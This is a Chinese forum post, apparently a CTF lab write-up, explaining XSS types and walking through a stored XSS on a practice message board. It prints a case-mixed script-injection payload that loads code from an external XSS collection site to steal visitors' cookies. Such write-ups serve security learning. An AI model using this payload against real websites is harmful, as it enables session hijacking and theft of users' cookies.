靶场wp4:储存型xss,cookie获取

你看不见我啊   ·   发表于 2018-08-09 11:22:42   ·   CTF&WP专版

1.首先了解xss

1. Reflected XSS(基于反射的XSS攻击)

2. Stored XSS(基于存储的XSS攻击)

3. DOM-based or local XSS(基于DOM或本地的XSS攻击)

具体听课

2.打开网站并在留言板所有地方输出弹屏代码进行测试,当然留言板每一栏都会有字符长度限制,所以我们要注意代码。

3.我们发现由此得知主题这个位置是存在xss

漏洞的,我们可以插入自己的代码。

4.因为有长度限制,所以一般我们都是插入一句话xss测试网站来进行测试

5.我们进入xss测试平台xss9,注册登录,创建项目,勾选选项

6.滑到下面,复制代码粘贴到主题处再次上传

</tExtArEa>'"><sCRiPt sRC=https://xss9.com/FILs></sCrIpT>

7.原理是你上传以后,只要有人访问到有你上传文件的那个页面(因为它是储存型xss)他就会收集你的cookie

8.然后我们去xss测试平台查看cookie

9.复制flag=zkz{xsser-g00d}

tips:1.注册xss请勿填写真实信息

有问题或建议请留言

打赏我,让我更有动力~

0 条回复   |  直到 2018-8-9 | 1380 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.